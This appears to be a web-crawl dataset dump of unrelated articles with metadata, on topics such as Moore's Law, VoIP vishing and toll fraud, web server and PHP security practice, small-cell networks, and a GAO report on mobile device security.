text stringlengths 234 589k | id stringlengths 47 47 | dump stringclasses 62 values | url stringlengths 16 734 | date stringlengths 20 20 ⌀ | file_path stringlengths 109 155 | language stringclasses 1 value | language_score float64 0.65 1 | token_count int64 57 124k | score float64 2.52 4.91 | int_score int64 3 5 |
|---|---|---|---|---|---|---|---|---|---|---|
In April of 1965, Electronics magazine published an article by Intel co-founder Gordon Moore. The article and the predictions that it made have since become the stuff of legend, and like most legends it has gone through a number of changes in the telling and retelling. The press seized on the article's argument that semiconductor technology would usher in a new era of electronic integration, and they distilled it into a maxim that has taken on multiple forms over the years. Regardless of the form that the maxim takes, though, it is always given the same name: Moore's Law.
Moore's Law is so perennially protean because its eponymous formulator never quite gave it a precise formulation. Rather, using prose, graphs, and a cartoon Moore wove together a collection of observations and insights in order to outline a cluster of trends that would change the way we live and work. In the main, Moore was right, and many of his specific predictions have come true over the years. The press, on the other hand, has met with mixed results in its attempts to sort out exactly what Moore said and, more importantly, what he meant. The present article represents my humble attempt to bring some order to the chaos of almost four decades of reporting and misreporting on an unbelievably complex industrial/social/psychological phenomenon.
Because this article is quite lengthy, I've divided it into three parts. I've also provided links and summaries for each part below so that you can skip to the part that interests you most:
What was Moore's original formulation? It wasn't about increasing "computing power," and there was a bit more to it than just shrinking feature sizes. Exploring what Moore originally said will give us the opportunity to learn about the major factors that shape semiconductor manufacturing, and that ultimately shape what we can do with computers and much of modern life. Finally, I'll look at how Moore's observation morphed into the present media construction of "Moore's Law" as a statement about performance.
In this section, I'll look at the kinds of possibilities for computing advancement that Moore's Law opens up. Power consumption, flexibility, and a host of other issues come into play when we start looking at the variety of ways to exploit the ever increasing levels of integration that Moore's Law affords us. In the end, we'll see why Moore's Law is just as responsible for "smaller, cheaper and more efficient" as it is for "bigger, faster and more power hungry."
In the third and final part, we'll look at some of the challenges currently facing designers who would make use of increasing transistor densities to keep Moore's cost/integration curves marching downwards. In some markets, system architects are arguing that more integration isn't always better, and in other markets they're finding it increasingly difficult to mix all the different types of circuits that they'd like to include on a single die.
The way that "Moore's Law" is usually cited by those in the know is something along the lines of: "the number of transistors that can be fit onto a square inch of silicon doubles every 12 months." The part of Moore's original 1965 paper that's usually cited in support of this formulation is the following graph:
This graph does indeed show transistor densities doubling every 12 months, so the formulation above is accurate. However, it doesn't quite do justice to the full scope of the picture that Moore painted in his brief, uncannily prescient paper. This is because Moore's paper dealt with more than just shrinking transistor sizes. Moore was ultimately interested in shrinking transistor costs, and in the effects that cheap, ubiquitous computing power would have on the way we live and work. This section of the present article aims to give you a general understanding of the various trends and factors that Moore wove together to predict the rise of the personal computer, the mobile phone, the digital wristwatch, and other innovations that we now take for granted. Of course, I should note that Moore's original paper was only four pages in length, while the present article is much longer. This is because Moore presumed quite a bit more background knowledge about the semiconductor industry than most non-specialists have. Thus this article aims to give you enough background to understand Moore's reasoning.
If you read through Moore's paper, the closest you'll come to a quote that resembles "Moore's Law" is the italicized portion of the following section, subtitled "Costs and curves."
Reduced cost is one of the big attractions of integrated electronics, and the cost advantage continues to increase as the technology evolves toward the production of larger and larger circuit functions on a single semiconductor substrate. For simple circuits, the cost per component is nearly inversely proportional to the number of components, the result of the equivalent piece of semiconductor in the equivalent package containing more components. But as components are added, decreased yields more than compensate for the increased complexity, tending to raise the cost per component. Thus there is a minimum cost at any given time in the evolution of the technology. At present, it is reached when 50 components are used per circuit. But the minimum is rising rapidly while the entire cost curve is falling (see graph below). If we look ahead five years, a plot of costs suggests that the minimum cost per component might be expected in circuits with about 1,000 components per circuit (providing such circuit functions can be produced in moderate quantities.) In 1970, the manufacturing cost per component can be expected to be only a tenth of the present cost.
The complexity for minimum component costs has increased at a rate of roughly a factor of two per year (see graph on next page) [emphasis mine]. Certainly over the short term this rate can be expected to continue, if not to increase. Over the longer term, the rate of increase is a bit more uncertain, although there is no reason to believe it will not remain nearly constant for at least 10 years.
What exactly does Moore mean by "the complexity for minimum component costs"? And what is the relationship between manufacturing defects, costs and the level of integration? The answers to these two questions are a bit complicated, but I'll do my best to break them down in a reasonably understandable manner.
One good place to begin an explanation of the italicized phrase is by rewriting it in a way that unpacks it a bit:
"The number of transistors per chip that yields the minimum cost per transistor has increased at a rate of roughly a factor of two per year."
This way of putting it is a little better, but the sentence is still impossible to parse correctly if you don't understand the multiple factors that influence the relationship between the number of transistors that you can put on a chip and the cost per individual chip. The following section is aimed at giving you an appreciation of those factors, so that you can better understand Moore's original insight.
This article was first published on February 20, 2003. | <urn:uuid:b52d53ca-9ceb-4734-b805-21093202a6a5> | CC-MAIN-2017-09 | https://arstechnica.com/gadgets/2008/09/moore/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501172018.95/warc/CC-MAIN-20170219104612-00479-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.965565 | 1,415 | 2.890625 | 3 |
Vishing and Toll Fraud
Vishing is quite similar to the term Phishing and it means collecting private information over the telephone system.
In the technical language the terminology of phishing is a recent addition. The main concept behind phishing is that –mail is sent to user by an attacker. The e-mail looks like a form of ethical business. The user is requested to confirm her/his info or data by entering that data on the web page, such as his/her “social security number”, even “bank or credit card account” number, “birth date”, or mother’s name. The attacker can then take this information provided by the user for unethical purposes.
Phishing is quite similar to the term vishing which is referred to as collecting such information over the telephone system. Since many users often trust the security or protection of a telephone against the protection of the web site, some users easily share their confidential information over the phone. Educating users is the most popular way to fight against the vishing attacks.
There is one more kind of scam occurred against telephony systems is called toll fraud. The basic idea of toll fraud is that an attacker using the telephony system uses to place calls he should not be permitted to make. For example a corporate telephony use rule that long distance personal calls are not permitted. If an employee disobeyed that policy and made a personal long distance call, that would be taken as one of the important examples of toll fraud.
More improved forms of toll fraud involve taking the advantage of vulnerability in the telephony system to place calls. “Cisco Unified Communications Manager” has many features that help fight toll fraud. The examples are “partitions” and “calling search spaces” that can be used to recognize that which phone numbers can be called from particular Cisco IP Phones. Another example, a “Forced Authorization Code” (FAC) can be used to require a user to enter a code to call a specific location.
There are different types of attacks that can be directed to voice networks. In this series of articles we will discuss all four types of VoIP vulnerabilities and attacks. This will certainly be enough to explain how VoIP telephony communication can be disabled or reduced in quality. The main four VoIP Vulnerabilities are:
- SPIT – spam over IP telephone (SPIT) includes, for example, sending unwanted messages to an IP phone’s display or making the IP phone to ring time to time.
- Vishing – is just like phishing, the difference is that the victim provides her/his personal information over the telephone rather than on website.
- Toll fraud – it happens when users incorrectly use a telephone system to make toll calls (for example international and or long distance calls) that they do not have approval to make.
- SIP attacks – they try to develop SIP’s use of famous protocols to intercept or manipulate SIP messages. Also, an attacker may trigger a DoS attack against a SIP server. | <urn:uuid:f5ae479f-57f1-4b33-95e6-4816693504fe> | CC-MAIN-2017-09 | https://howdoesinternetwork.com/2012/voip-vishing-toll-fraud | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501172018.95/warc/CC-MAIN-20170219104612-00479-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.935914 | 634 | 3.078125 | 3 |
Learn Best Practices for Web Server Security
In this, the first of two articles, we will talk about securing the overall hosting environment, PHP (surprise), and file system permissions. Many people will try to sell you an "application firewall" or similar devices, but I tend to believe that's too reactive, and not enough of a proactive approach to security. Every little bit helps in security, but adding layers without addressing the underlying problem is asking for trouble.
The Environment We Must Live With
In the world of Unix, especially Linux, we must hold to some truths. There are specific file system permissions required for certain things to happen, we must allow some level of access to users' scripts and PHP applications, and we cannot lock things down as tightly as we'd like. I can create and thoroughly secure a Web server hosting static content, but how useful is that? The most secure Linux box is disconnected from the network, but again, it is not very useful. Somewhere, in between multiple extremes, there is a workable medium.
We aren't talking about a happy medium, notice. There is no happy medium in security. Keeping any platform secure is an iterative process, which involves multiple layers of security and constant maintenance.
Many companies, at least a few I've seen recently, have widely varying ideas about how to configure permissions for Web hosting users. The two basic schools of thought are: give every user their own group and a umask of 002, or require that the user maintain their own permissions, with a 022 umask.
In the first scenario, the benefit is that when collaborating, users never need to mess with permissions. Their umask will cause files to be written with group writable permissions, which is OK, because context matters. If they are writing files to a shared group resource, the parent directory will have the setgid bit set, and all files will be created with the same group id. Likewise, if they are in their own space, files will be written with the user's own group id. There are no obvious security holes here, but two issues quickly come to mind. First, this is training the user of the system to not pay attention to permissions at all. Second, certain security settings and third-party modules will not operate if files are group-writable, because the potential exists for malicious code to be introduced. If a single user's account in a group is compromised, the shared storage is as well.
The second scenario doesn't train users to ignore permissions, and allows modules like su_exec to run without hacking the source and commenting out the code that checks for group-writable files. In the end, the biggest concern regardless of the strategy to deal with collaboration among users, is that users will continue creating world-writable directories.
Many Web applications, even popular ones, tell the user to 'chmod 777' as part of the install process. That's fine, but they never tell them to fix the permissions after the installation process! Increasingly, especially in the .edu world, I've seen more and more malicious scripts actively looking for world-writable directories. A compromise of a single site on a server often leads to many sites having unauthorized content written to them.
Of course, we cannot talk about Web security without mentioning PHP, the bane of Web hosting.
PHP scripts are generally interpreted via the mod_php Apache module. This means that PHP scripts written by a user will run as the Web server user. This standard configuration causes many issues with file permissions. What if a Web developer wants to connect to a database? They must provide a password, and the file containing the password must be readable by the Web server. Since the Web server runs all scripts as the same user (it's running PHP itself), all users on the system can access this information via their own PHP scripts. There must be a better way.
And indeed, if you're running mod_suexec, you can execute CGI programs as the user that owns them. Apache will run a program as root, which detects what user it should switch to based on the owner, and then runs the CGI as that user. PHP on the other hand, cannot be done this way, unless you're running Apache as root (don't). The workaround, since suphp doesn't really work, is to run all PHP applications as a CGI program. There's quite a performance hit, but the benefits provided by running PHP applications as the user that owns then far outweigh the performance concerns—buy more servers and be done with it.
With user-run PHP scripts, you can easily identify which user's application is at fault when someone has executed a script that spams or launches a DoS attack.
This is one step closer to managing the problem, but we're still not doing anything about the initial attack vector. Two problems exist: insecure PHP settings, and insecure applications. The entire next article will be devoted to insecure applications.
PHP settings are tricky. Most downloadable applications, especially the popular blogs or CMSes, will break if you reign in PHP too tightly. Setting safe_mode, for example, will break most PHP. Dallas Kashuba of Dreamhost was kind enough to share with me some PHP settings they use for the few customers that use mod_php. The set of most dangerous PHP functions, ones that should be disabled, are:
One final note: an extremely useful module available for Apache is mod_security. Very much like an application firewall device does, mod_security will inspect every transaction and compare it to a list of possible attacks. The rules by which it blocks exploits must be constantly updated, but it's certainly worth the care and feeding.
It's all about minimizing the likelihood of break-ins, and then minimizing the impact they can have. There are many more aspects to securing a server in a multi-user environment, which I briefly wrote about previously in, "Keeping a Lid on Linux Logins." Carla Schroder also introduces SELinux, in "Tips For Taming SELinux."
As much as we'd like to prevent security incidents in the Web hosting world, we have come to face the reality that they will happen. Come back next week to learn about managing the major problem: the applications themselves. | <urn:uuid:40ce74da-7f95-48e8-a1cc-4323582d923e> | CC-MAIN-2017-09 | http://www.enterprisenetworkingplanet.com/print/netsecur/article.php/3730741/Learn-Best-Practices-for-Web-Server-Security.htm | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501170614.88/warc/CC-MAIN-20170219104610-00599-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.942345 | 1,293 | 2.6875 | 3 |
Internet telephony – What is it and how does it work?
The terms IP telephony (IP = Internet Protocol) and Voice over IP (in short: VoIP) refer to making telephone calls via a computer network, whereby the data is transferred according to the IP Standard. This form of telephony is better known as internet telephony. It is necessary to prepare data for transfer via the internet to comply with the rules of the Internet Protocol. The transfer routes used here are the same as those employed for standard data transferral via the internet.
With internet telephony from NFON it is possible to integrate Unified Communication (UC) as well as fax solutions via XCAPI.
Internet telephony hardware
In order to use internet telephony one requires the appropriate hardware. Four different alternatives are available here. The first option is to use a standard computer with microphone for user voice capturing, as well as a loudspeaker or headphones in order to listen to the conversation participants. Added to this comes the application and installation of special software on the PC. Secondly, it is possible to use specific VoIP end devices as well as IP and SIP telephones. These only differ from a standard telephone in terms of the technology that enables the data transfer via the internet. As a further option it is possible to use the conventional telephone and connect this to a special adapter, which converts the analogue telephone data into digital signals. Finally, it is also possible to use a mobile phone by connecting through the telephone system via an FMC client. The advantage of the last three options lies in the operation of the device, which can be used in the same way as a conventional telephone. A further benefit is that the user is also attainable when the PC is switched off.
How VoIP works
First, the acoustic signals are digitalised during the data transfer, and divided up into individual data packages. These data packages are subsequently labelled with a so-called header. These headers contain information about the identity of the sender and recipient, or regarding the status of the message. It is now necessary to establish a connection. To do so one uses a Session Initiation Protocol Address (in short: SIP address). This is only assigned once, so that it is possible to uniquely identify the address. Activating the device results in this logging into a server. The server then registers the login. If this SIP address is called up by another participant then this request is passed on to the server that the user is registered with. The server passes the call on to the end device and therefore establishes a telephone conversation. Because the SIP address is not bound to a certain connection - in the manner of a standard telephone number - the user is connected with the internet by means of the corresponding end device and is therefore attainable anywhere in the world. It is now also possible to connect internet telephony with the standard telephone network. This takes place via certain gateways. This provides the user with the option of using a conventional telephone in order to call a VoIP telephone and vice versa. The so-called Media Gateway can be used for example with an ISDN connection or likewise with an analogue telephone connection.
The advantages of VoIP
The first noteworthy advantage here is that internet telephony is a particularly low-cost option, because almost every household has flat rate internet nowadays. Therefore, no further costs arise because IP telephony simply accesses this. This means that the standard telephone connection is superfluous and can even be removed. The costs of the individual telephone calls are usually also lower here than with analogue telephony. Telephone conversations with participants using the same VoIP provider are usually free of charge. It is also often the case that calling participants using alternative VoIP providers is also free; only in a few cases are fees charged here. However, calls placed within the standard telephone network are always subject to charges, although these are very low with many providers. | <urn:uuid:383ef7ef-c262-40fb-9d82-f623d1340f5f> | CC-MAIN-2017-09 | https://www.nfon.com/en_de/solutions/resources/glossary/internet-telephony/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501171781.5/warc/CC-MAIN-20170219104611-00651-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.938339 | 794 | 3.734375 | 4 |
Practical Python for Network Engineers
Topic: Input and Output
Python is becoming the de-facto standard for the Software Driven Networking world. From full-blown SDN controllers to simple network device query, it is the language of choice for companies large to small due to its simplicity and maintainability. Even with its beginner-friendly mantra, it is a fully powerful language that supports the infrastructure of companies like Google and NetFlix. The course is aim to bring a previously CLI-focused Network Engineer up to speed on Python programming basics. Unlike other Python introductory courses, the course will give practical examples in each of the lessons on how the covered material applies to the tasks for network engineers. At the end of the course, the participant will be able to write basic scripts to begin utilize libraries such as PExpect, Ansible, Paramiko and others. | <urn:uuid:58b6da9e-92b1-4aec-b022-ea4ddfc66b93> | CC-MAIN-2017-09 | https://streaming.ine.com/play/3e0fad47-c3d5-4689-b6a3-bc0ecb502f70/input-demo | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501172077.66/warc/CC-MAIN-20170219104612-00175-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.92787 | 175 | 2.65625 | 3 |
A quick definition of the term “Real-Time” is in order here. Probably the best way to explain this is by subtraction, or by explaining what it is not.
Consider the timings behind the process of sending and receiving an email message. Email is occasionally described as a “store and forward” protocol, and even though it is not absolutely correct to classify it this way (refer to the Wikipedia definition), it does render the idea that there is commonly a measurable delay between the composition plus sending of an email, and the eventual reception and reading of that same email.
This delay between sending and receiving is largely irrelevant for email delivery, and in the vast majority of cases, nobody really cares about the delay – particularly keeping in mind that a person’s mailbox can receive several messages in a very short span of time, making it impossible for the reader to process the contents immediately.
In summary, if an email is delayed by a few minutes, the impact on operations is virtually nil.
Voice communications, on the other hand, are of a completely different nature. During the course of a phone call, a propagation delay of more than around 400 milliseconds is immediately noticeable to the participants, and will severely impact the perceived call quality.
Assuming that your internet and networking services have sufficient bandwidth generally to carry your voice traffic, it is fairly safe to conclude that whenever you encounter call quality issues of this type, the cause is due to some point of the network being sufficiently overworked, or congested. This introduces additional delay beyond the normal propagation delay (which most people call “ping time”).
What is QoS?
Quality of Service, in the context of VoIP, is a collection of concepts and techniques that come together to provide a means to safeguard optimum call quality within the constraints of the limited bandwidth available.
Bandwidth Reservation – This mechanism, sometimes found on entry-level routers, simply reserves a certain percentage of the available bandwidth for classified traffic. If, for example, you reserve 100kbps, of the 2000kbps bandwidth available, for VoIP traffic, then even during times when other traffic is competing for bandwidth, the router will guarantee bandwidth for VoIP; if the VoIP traffic requests 50kbps, then the router will fully satisfy all VoIP traffic requests, and the remaining bandwidth will be utilised for other traffic; If the VoIP traffic requests 300kbps, then the router will guarantee 100kbps for VoIP, while the remaining traffic competes for the remaining bandwidth.
Traffic Tagging – Network traffic can be tagged with special markers to indicate priority levels. The mechanism is documented in RFC 2474, and it defines the “Differentiated Services” field in IPv4 and IPv6 headers for traffic classification purposes. Note that this mechanism is simply a way to mark packets so any routers or hops involved in the flow of traffic may implement specific behavior relevant to the class of traffic, with the behaviour typically being one of prioritizing the traffic based on class. If you need to implement QoS, your task will involve configuring your VoIP devices, particularly your 3CX machine, to tag VoIP traffic appropriately for routing devices to action accordingly. On Windows-based Operating Systems, this is implemented at Local Policy or Group Policy level, and at the end of this chapter you have a simple example to implement QoS tagging on Windows 2008 or 2012 Server.
Prioritization – Tagging traffic is only a part of the solution. You will also need to make sure that all intervening devices and services prioritize the tagged traffic. In particular, you should ensure that your Internet Service Provider does honour tagged traffic, and that it will prioritize accordingly.
Typical Congestion Points
To better understand how to address network congestion, some pointers on “where to look” can come in very handy. What follows is not a completely exhaustive list, but certainly a great starting point.
WAN-to-LAN device (Router/Firewall)
Even though internet connectivity continues to improve practically everywhere, the available bandwidth remains a limited resource.
Your first sanity check should always be to ensure that you are not attempting to deliver more calls across your internet connection than your bandwidth can handle. Most internet connections are asymmetrical – meaning that the download and upload bandwidth availability is NOT the same. Typically, upload bandwidth is significantly lower than download bandwidth, and therefore it is generally the upload bandwidth that is your limiting factor (bottleneck). This is because a voice conversation requires voice data to be sent and received simultaneously.
One simple way to try to confirm that the congestion point is at the WAN-to-LAN device is to check that:
- A voice call that travels over your internet connection experiences call quality issues.
- A voice call that does NOT travel over your internet connection (typically by making an extension to extension call where both extensions are on the same LAN as your PBX) does NOT experience call quality issues.
If the answer to both questions is “yes”, then it is fairly sure that the congestion point is your WAN-to-LAN device.
Desk Phones used as Mini-Switches
Many SIP desk phones today offer the added convenience of a second ethernet port, allowing you to daisy-chain a PC to the LAN through the phone, reducing the number of network points that you need to deploy into your premises.
Certain situations, however, can give rise to seemingly unexplained call quality issues. These symptoms are typically intermittent, experienced only by one user at any point in time, with no real difference between whether the call is to another LAN extension or to an external caller.
- Most calls seem fine.
- Some calls have call quality issues throughout.
- Some calls start off ok, with call quality degrading at some point during the call.
- Some calls start with bad call quality, with the problem disappearing during the call.
This can sometimes be traced to the fact that the PC connected to the Desk phone in question is making sufficient use of the network to overwhelm the processing power of the phone. You can confirm this by disconnecting the PC from the phone.
Internal LAN Devices
Certain network layouts can also occasionally expose symptoms very similar to the ones described above with a PC connected to a Desk phone. This time however, the incident is very likely to be related to intermittent very high network usage. More susceptible than others would be environments requiring transmission of very large documents over the network – a graphics design house, for example.
If your LAN is composed of two or more sites linked together over an MPLS network, these symptoms can manifest themselves more than over a conventional LAN.
Arguably, the best way to address this type of scenario is to implement QoS on the LAN, by implementing traffic tagging on VoIP devices (including your IP-PBX) and by ensuring that your switches and routers are correctly configured to prioritize traffic based on the traffic tags.
For some interesting reading on this topic, you may wish to refer to Donald Egbenyon’s Bachelor Thesis, Turku University of Applied Sciences:
If you are using WiFi devices inside your premises, do keep in mind that each Access Point has a limited coverage area, and that a WiFi device that moves from one Access Point to another will need some time to “roam” across. This can take long enough to drop a call and require your WiFi device to re-register itself with 3CX .
You may need to investigate a WiFi infrastructure that reduces the handoff process to no more than milliseconds to avoid such situations. This is typically achieved by using multiple Access Points that present the WiFi device with a single WiFi zone, while the back end takes care of managing which Access Point will provide the service.
A Word About VLANs
For most network engineers, the preferred sure-fire way to handle potential issues of competition for bandwidth between Voice and Data is to keep the different traffic types separate, by segregating Voice into its own LAN using a physically separate network of switches, or using VLANs to achieve the same scope.
While this is most certainly a very effective way of approaching the challenge, you must keep in mind that the concept of Unified Communications is to bring about a convergence of Voice and Data. In particular, a user who runs a VoIP application on his desktop computer (a 3CX client being an excellent example) immediately brings about the need for Voice and Data to travel on the same LAN – and the trend is certainly making this the “normal” way to work.
You may find that QoS on the LAN brings about better returns when addressing such issues.
Configuring QoS on Windows | <urn:uuid:c9c83e26-e7f7-40e9-b883-8305531a0cf9> | CC-MAIN-2017-09 | https://www.3cx.com/blog/voip-howto/real-time-network-traffic-and-qos/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501172077.66/warc/CC-MAIN-20170219104612-00175-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.938192 | 1,786 | 3.015625 | 3 |
When all you have is a hammer, they say, everything looks like a nail. Instead, we give you a look at several language-hammers, so you can make a reasonable decision about when each is the best tool for the job.
Deciding when to use any language—including Ruby—depends on the appropriateness to task and the amount of yak shaving necessary. Zed Shaw explains when Ruby's MRI or JRuby is the best language for the job, and when it really isn't.
Python is a powerful, easy-to-use scripting language suitable for use in the enterprise, although it is not right for absolutely every use. Python expert Martin Aspeli identifies when Python is the right choice, and when another language might be a better option.
PHP may be the most popular Web scripting language in the world. But despite a large collection of nails, not every tool is a hammer. So when should it be used, and when would another dynamic programming language be a better choice? We identify its strengths and weaknesses.
Zend's John Coggeshall responds to CIO.com's earlier PHP article with his own list of the Good, the Bad and the Ugly of PHP application development.
Every programming language has its strengths...and its weaknesses. We identify five tasks for which perl is ideally suited, and four that...well, really, shouldn't you choose something else? | <urn:uuid:67043877-0a6b-46c2-b025-169f1ad293fa> | CC-MAIN-2017-09 | http://www.cio.com/article/2437007/developer/you-used-that-programming-language-to-write-what--.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501173872.97/warc/CC-MAIN-20170219104613-00351-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.941164 | 289 | 2.59375 | 3 |
Last week, Montana Attorney General Mike McGrath announced a new Web site, www.safeinyourspace.org, designed to educate young people -- and the adults in their lives -- about some of the kinds of dangers they might face online.
McGrath made the announcement at an event at the Attorney General's Office in Helena. He was joined by Superintendent of Public Instruction Linda McCulloch and representatives of the Montana Safe Schools Center at the University of Montana. The site was designed in cooperation with the center.
"We think this site will help start the conversation between young people and the adults in their lives," McGrath said. "Safe in YourSpace encourages children, parents and teachers to talk with one another about how to stay safe online."
"The Internet is a valuable educational tool that gives students access to resources around the world," McCulloch said. "This Web site will help educate students, parents, educators and community members on ways to keep our students safe while they are surfing the Web at home or at school."
The site has specific information for teens, parents and teachers. It covers a variety of topics, including cyberbullying, Internet predators and technical issues for teachers. The section for teens has information and tips on e-mail, instant messaging, social networking and peer-to-peer networking. It also includes a glossary of terms and links to state and national organizations.
McGrath noted that sometimes, young people are more technically savvy than their parents.
"We know kids are going to use technology, and we need to encourage that," he said. "But while young people may know how to navigate pages and sites, they don't necessarily know how to make good decisions about some of what they face on the Net."
The Safe Schools Center at the University of Montana has provided training with the National Center for Missing and Exploited Children and i-SAFE, a nonprofit foundation that focuses on Internet safety.
"Online predation, identity theft, cyberbullying - these are issues young people have to be prepared for on a daily basis," said Rick van den Pol, director of the Safe Schools Center. | <urn:uuid:39aceea7-e9f9-457c-aefb-91189bcddac5> | CC-MAIN-2017-09 | http://www.govtech.com/security/New-Montana-Cyber-Safety-Web-Site.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501173872.97/warc/CC-MAIN-20170219104613-00351-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.967745 | 436 | 2.75 | 3 |
CLEAN Technology INC. | Date: 1997-02-11
recycled plastic in the form of pellets and flakes for use in manufacturing and for general industrial use.
CLEAN Technology INC. | Date: 1994-09-16
food grade recycled plastic in the form of pellets and flakes for use in manufacturing and for general industrial use.
Clean Technology Inc. and Plastipak Packaging Inc. | Date: 1991-12-24
Clean Technology LLC | Date: 2008-10-21
Li T.,Tokyo Institute of Technology |
Choi S.,Tokyo Institute of Technology |
Watanabe T.,Tokyo Institute of Technology |
Nakayama T.,Clean Technology Co. |
Tanaka T.,Clean Technology Co.
Thin Solid Films | Year: 2012
Arc discharge with argon and nitrogen was generated across the long electrode gap distance of 400 mm to produce a stable thermal plasma and large volume with low power under atmospheric pressure. In the case of nitrogen as plasma forming gas, an increase of the gas flow rate increases the arc voltage, thus the center temperature of the arc column reached higher. For the argon arc, the arc voltage decreases with increasing gas flow rates. Due to the arc constriction in both cases of nitrogen and argon, the center temperature of the arc column increases under the constant current. The result of emission intensity distribution across nitrogen arc column reveals that the arc column diameter increases with increasing gas flow rate because of the increase of the input power. On the other hand, in the argon arc, the diameter decreases by strong thermal pinch in large flow rate of argon. The measured excitation temperature is uniform along with axial direction of the arc column which is an important feature for waste materials processing due to the long direct current arc plasma that provides long residence time for injected materials. © 2012 Elsevier B.V. All rights reserved. Source | <urn:uuid:1ac3c456-1389-4487-b8c9-ed443275a8d9> | CC-MAIN-2017-09 | https://www.linknovate.com/affiliation/clean-technology-co-825514/all/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501170925.44/warc/CC-MAIN-20170219104610-00471-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.854962 | 392 | 2.625 | 3 |
Most of us remember when femtocells were the “next big thing” in wireless services. In the early days, small-cell solutions emerged as tools for addressing gaps in wireless coverage. Today, small-cell technology is (rightfully) being repurposed to address the ever-pressing issue of mobile-bandwidth shortage. It certainly has great potential, but even with carriers aggressively pursuing small-cell deployments, it remains unclear which models and strategies will be successful.
The business case for exploiting small-cell technologies for scale-based infrastructure enhancement is simple: Growth in mobile-data consumption threatens to outpace the rate at which carriers can add capacity in the form of traditional cell towers. The small-cell solution, which today exists in several versions, with effective ranges between 50 and 5,000 feet, allows carriers to replicate the connectivity of cell towers on a much smaller scale. While these smaller cells can’t handle the capacity of a full-scale (or macrosite) cell tower, they can be deployed in greater numbers, creating antenna arrays that provide substantial capacity. Additionally, unlike macrocell cites, small cells are relatively discreet and can be mounted in densely populated locations and urban environments.
Carriers are counting on small cells to deliver, with nearly all (98 percent) mobile operators viewing small-cell applications as essential to the future of their networks, according to a recent study by Informa Telecoms & Media. Further, nine of the world’s 10 largest wireless operators have deployed small cells. Just last month, AT&T announced that it will spend $8 billion on wireless initiatives to blanket 300 million people with coverage by year-end 2014 through small-cell enhanced LTE network strategy. The company’s strategy calls for the deployment of more than 1,000 distributed antenna systems as well as leveraging 40,000 small cells to move traffic to AT&T’s fiber networks. In other words, with no clearly successful model in the market yet, AT&T is adopting the heterogeneous network (HetNet) model in which it will use of a variety of radio and hardware technologies to achieve maximum network capacity and density.
Sprint has similar plans, anchored by a large-scale rollout of picocells next year, in highly trafficked environments (think airports and stadiums). Verizon has not yet detailed its small-cell plans, but reportedly sees small-cell solutions as being more applicable in some settings (e.g., dense urban) than others.
Still, the drive forward by two major carriers, which comes as the carrier world at large continues to address the practical challenges of small-cell deployments, including security, interference, synchronization and backhaul, underscores the pressure carriers face with respect to mobile data demand. Even though challenges remain with respect to small cells, demand is great enough for forward-thinking carriers to pursue deployment strategies while kinks are being worked out. In this column, we previously addressed the reality that, with market-leading devices and platforms reaching across all carriers and networks, competition is moving from device availability to network performance. Major small-cell builds starting next year for AT&T and Sprint are clear signals this shift has already occurred.
This analysis originally appeared in B/OSS Magazine. | <urn:uuid:9d3ebaaf-1161-4978-9e9e-11a47e43174f> | CC-MAIN-2017-09 | http://www.atlantic-acm.com/big-hopes-for-small-cells-but-no-clear-path-to-success/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-09/segments/1487501171166.18/warc/CC-MAIN-20170219104611-00647-ip-10-171-10-108.ec2.internal.warc.gz | en | 0.955762 | 662 | 2.515625 | 3 |
Part of the issue is the fact that consumer security awareness is not at the level that it should be, the GAO said, and federal efforts to help have so far been lacking.
The GAO report noted that cyber criminals may use a variety of attack methods, including intercepting data as they are transmitted to and from mobile devices and inserting malicious code into software applications to gain access to users’ sensitive information. Premium SMS scams are on the rise, and there’s also just good old-fashioned phishing and teasing to malicious links at a website.
These threats and attacks are facilitated by vulnerabilities in the design and configuration of mobile devices, as well as the ways consumers use them, the GAO noted. Common vulnerabilities include a failure to enable password protection and operating systems that are not kept up to date with the latest security patches.
The GAO said that protection will have to be a multi-pronged effort that takes into account all parties. For instance, mobile device manufacturers and wireless carriers can implement technical features, such as enabling passwords and encryption to limit or prevent attacks. Meanwhile, consumers can adopt key practices, including setting passwords, using two-step authentication and limiting the use of public wireless connections for sensitive transactions, which can significantly mitigate the risk that their devices will be compromised. Unfortunately, many consumers still do not know how to protect themselves from mobile security vulnerabilities, raising questions about the effectiveness of public-awareness efforts.
Meanwhile, federal agencies and private companies have promoted secure technologies and practices through standards and public-private partnerships. But the GAO said that despite these efforts, safeguards have not been consistently implemented.
For instance, the Federal Communications Commission (FCC) has facilitated public-private coordination to address specific challenges, such as cellphone theft. However, it has not yet taken similar steps to encourage device manufacturers and wireless carriers to implement a more complete industry baseline of mobile security safeguards.
When it comes to consumer awareness, neither the Department of Homeland Security (DHS) or the National Institute of Standards and Technology (NIST) have yet developed performance measures or a baseline understanding of the current state of national cybersecurity awareness that would help them determine whether public awareness efforts are achieving stated goals and objectives.
The Obama Administration has been considering issuing an executive order to get such broad initiatives underway. Efforts to get a cybersecurity bill through Congress have to date failed, prompting Democrats to call on the White House to mandate cybersecurity protection measures for businesses and government agencies alike through an executive order. The GOP has maintained that such a step is an overstepping of government authority into the realm of private enterprise – one that will hamper competition and innovation by placing too many regulatory restraints on daily operations.
In fact, government agencies are unsure of how to secure their own infrastructure, let alone help citizens do so.
